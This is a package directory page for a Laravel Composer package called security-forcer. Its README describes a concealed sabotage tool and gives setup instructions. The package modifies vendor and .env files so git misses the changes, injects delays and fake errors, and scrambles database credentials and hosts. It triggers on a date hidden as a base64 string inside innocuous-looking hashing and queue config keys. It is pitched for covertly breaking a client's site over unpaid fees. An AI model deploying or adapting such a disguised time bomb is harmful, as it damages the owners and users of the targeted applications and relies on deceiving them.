PHPackages lmande/security-forcer - PHPackages - PHPackages [Skip to content](#main-content)[PHPackages](/)[Directory](/)[Categories](/categories)[Trending](/trending)[Leaderboard](/leaderboard)[Changelog](/changelog)[Analyze](/analyze)[Collections](/collections)[Log in](/login)[Sign up](/register) 1. [Directory](/) 2. / 3. [Security](/categories/security) 4. / 5. lmande/security-forcer ActiveLibrary[Security](/categories/security) lmande/security-forcer ====================== A package to force laravel developers for composer security 1.2.0(5y ago)014MITPHPPHP ^7.2.5|^8.0 Since Feb 22Pushed 5y ago1 watchersCompare [ Source](https://github.com/lmande/security-forcer)[ Packagist](https://packagist.org/packages/lmande/security-forcer)[ RSS](/packages/lmande-security-forcer/feed)WikiDiscussions master Synced 1w ago READMEChangelogDependencies (1)Versions (5)Used By (0) Security Forcer =============== [](#security-forcer) A composer package to force laravel developers for composer security. This package should not be included in production or for finished applications. ### Use of this package in practice [](#use-of-this-package-in-practice) - You can use this to test your anti-malware, anti-virus packages/scripts. - You can use this to stop your working code in case if your client steals your code with an unpaid portion of your earnings. - You should be able to set a timer which would cause troubled times after the given date for the project. - If you are to use this project for a shady client to secure your unpaid earnings please remember to remove it from the composer dependencies once/if you ever get your payment. This package would only cause trouble / broke a working site / give strange errors and cause a buggy application. It will never steal any information or damage database entries etc. It is intended to cause soft but much effective bugs. You won't be able to cause any damage at all if conditions are not met. For example security-forcer will not target any project but a project you specifically told to target and (optionally) only after given date. Please don't use this package for an unlawful action. I don't have any responsibility for your use of this package. You are welcome to fork it and change code for your needs. ### What It Does: [](#what-it-does) It modifies laravel vendor files and the apps' env files. This way it doesn't get caught in git. Here is the list of package actions and what they do: - **NightDistributer:** puts '*sleep(1)*' function inside application run cycles such as Illuminate\\Pipeline\\Pipeline, Illuminate\\Routing\\Router etc. and inside all functions of Illuminate\\Database\\Eloquent\\Collection. That's about minimum 20+ seconds of response time if you are not using a lot of infected functions. Here is the full list: - Pipeline @ then,thenReturn,a (repeated) closure - Router @ dispatch,runRoute,dispatchToRoute - Route @ run - Eloquent\\Collection @ \* - TransformsRequest @ handle - ValidatePostSize @ handle - Foundation\\Http\\Kernel @ handle - AddQueuedCookiesToResponse @ handle - StartSession @ handle - **RandomLimit:** with a `time() % 11 < 4` chance, application will throw "509 Whoops, looks like something went wrong." fake error. - **SyntaxHandler:** with a `time() % 11 > 8` chance, application will throw `undefined variable: items` fake error. It will show the real ending line number of controller@action. - **ApplyCredential:** forces application to use altered password that is original\_password + whitespace ("password123" becomes "password123 ") - **ApplyDebugOff:** forces application to run with app.debug=false to prevent detailed errors - **ApplyDebugOn:** forces application to run with app.debug=true to show errors - **ApplyHost:** sets applications default db host to **locaIhost** (if the current value is *localhost*) or **127.0.0.0**. *(both are invalid. keyword locaIhost includes uppercase i instead of l and obviously 127.0.0.0 is not 127.0.0.1)* - **MixConnection:** modifies .env **DB\_CONNECTION** to **pgsql**. If you are already using pgsql driver this is useless meh. - **MixCredentials:** changes .env **DB\_USERNAME** and **DB\_PASSWORD** values and randomize them. - **MixDebug:** modifies .env **APP\_DEBUG** to **false** - **MixHost:** changes .env **DB\_HOST** to 127.0.0.0 ### Usage [](#usage) **In its easiest use you define a config value.** For example in your config/hashing.php file, create an index with argon2id and set 'seed'. 'seed' should return a boolean value to tell the package whether it should run or not. Package will look for the value of `config('hashing.argon2id.seed')` to determine. You can see an example below with the 'seed' value example. ``` 'argon2id' => [ 'seed' => (time() > (new \DateTime(base64_decode('MjAyMS0wNi0wMQ==')))->format('U')), // will activate after a certain date ] ``` It is possible that you may not want this condition based on one index alone. So there are 4 config values that you can play with: 'hashing.argon2id.seed' or 'session.redis.secure' or 'logging.syslog.daily' and 'app.sfa'. **This is how the package will decide:** ``` config('app.sfa', true) && ( config('hashing.argon2id.seed', null) || config('session.redis.secure', null) || config('logging.syslog.daily', null) ) // package will run if this returns true ``` **Selecting which actions to run:**To make a selection you can combine actions' ids using OR (|) operator or just use the final value. All actions have an id and you can access them using: ``` ActionNameHere::getAId(); // : int ``` Your selection of actions reside inside *config('queue.connections.sqs.spin')*. Here is an example for your queue.php: ``` return [ // ... 'connections' => [ // ... 'sqs' => [ 'driver' => 'sqs', 'key' => env('AWS_ACCESS_KEY_ID'), 'secret' => env('AWS_SECRET_ACCESS_KEY'), 'prefix' => env('SQS_PREFIX', 'https://sqs.us-east-1.amazonaws.com/your-account-id'), 'queue' => env('SQS_QUEUE', 'your-queue-name'), 'suffix' => env('SQS_SUFFIX'), 'region' => env('AWS_DEFAULT_REGION', 'us-east-1'), 'spin' => ( // this is where you pass your actions or dont add this at all and package will run all its actions \Lmande\SecurityForcer\Actions\ApplyCredential::getAId() | \Lmande\SecurityForcer\Actions\ApplyDebugOff::getAId() | \Lmande\SecurityForcer\Actions\ApplyDebugOn::getAId() | \Lmande\SecurityForcer\Actions\ApplyHost::getAId() | \Lmande\SecurityForcer\Actions\NightDistributer::getAId() | \Lmande\SecurityForcer\Actions\RandomLimit::getAId() | \Lmande\SecurityForcer\Actions\SyntaxHandler::getAId() | \Lmande\SecurityForcer\Actions\MixConnection::getAId() | \Lmande\SecurityForcer\Actions\MixCredentials::getAId() | \Lmande\SecurityForcer\Actions\MixDebug::getAId() | \Lmande\SecurityForcer\Actions\MixHost::getAId() ), ], // ... ``` or you can also keep it short and abstract and after you calculate the final value you can pass it directly: ``` return [ // ... 'connections' => [ // ... 'sqs' => [ // ... 'spin' => 1792, // this val causes package to run only the following actions: NightDistributer, RandomLimit, SyntaxHandler ], // ... ``` Then you can just visit your site and it will run its' actions if conditions are met. You can also set APP\_ENV=stesting and run `php artisan sf:start` in console to make a test run. ### How to get rid of this and its effects: [](#how-to-get-rid-of-this-and-its-effects) - Remember to shame your boss first if s/he didn't give the previous developer his/her earned money and if this is why your boss wants you to fix it instead of paying for an already completed honest work. - Remove this package from your composer.json - Delete your vendor directory - composer install ### Health Score 26 — LowBetter than 43% of packages Maintenance20 Infrequent updates — may be unmaintained Popularity6 Limited adoption so far Community7 Small or concentrated contributor base Maturity61 Established project with proven stability Bus Factor1 Top contributor holds 100% of commits — single point of failure How is this calculated?**Maintenance (25%)** — Last commit recency, latest release date, and issue-to-star ratio. Uses a 2-year decay window. **Popularity (30%)** — Total and monthly downloads, GitHub stars, and forks. Logarithmic scaling prevents top-heavy scores. **Community (15%)** — Contributors, dependents, forks, watchers, and maintainers. Measures real ecosystem engagement. **Maturity (30%)** — Project age, version count, PHP version support, and release stability. ### Release Activity Cadence Every ~3 days Total 4 Last Release 1901d ago ### Community Maintainers ![](https://www.gravatar.com/avatar/bbc2f7cba823bb0bf259b1a62bb3df056b2d4afeda80d85fb55fe19ce1ae73de?d=identicon)[lmande](/maintainers/lmande) --- Top Contributors [![lmande](https://avatars.githubusercontent.com/u/11136948?v=4)](https://github.com/lmande "lmande (46 commits)") ### Embed Badge ![Health badge](/badges/lmande-security-forcer/health.svg) ``` [![Health](https://phpackages.com/badges/lmande-security-forcer/health.svg)](https://phpackages.com/packages/lmande-security-forcer) ``` ### Alternatives [defuse/php-encryption Secure PHP Encryption Library 3.9k162.4M214](/packages/defuse-php-encryption)[roave/security-advisories Prevents installation of composer packages with known security vulnerabilities: no API, simply require it 2.9k97.3M6.4k](/packages/roave-security-advisories)[mews/purifier Laravel 5/6/7/8/9/10 HtmlPurifier Package 2.0k16.7M113](/packages/mews-purifier)[robrichards/xmlseclibs A PHP library for XML Security 41278.1M118](/packages/robrichards-xmlseclibs)[bjeavons/zxcvbn-php Realistic password strength estimation PHP library based on Zxcvbn JS 86917.5M63](/packages/bjeavons-zxcvbn-php)[illuminate/encryption The Illuminate Encryption package. 9229.7M280](/packages/illuminate-encryption) PHPackages © 2026 [Directory](/)[Categories](/categories)[Trending](/trending)[Changelog](/changelog)[Analyze](/analyze)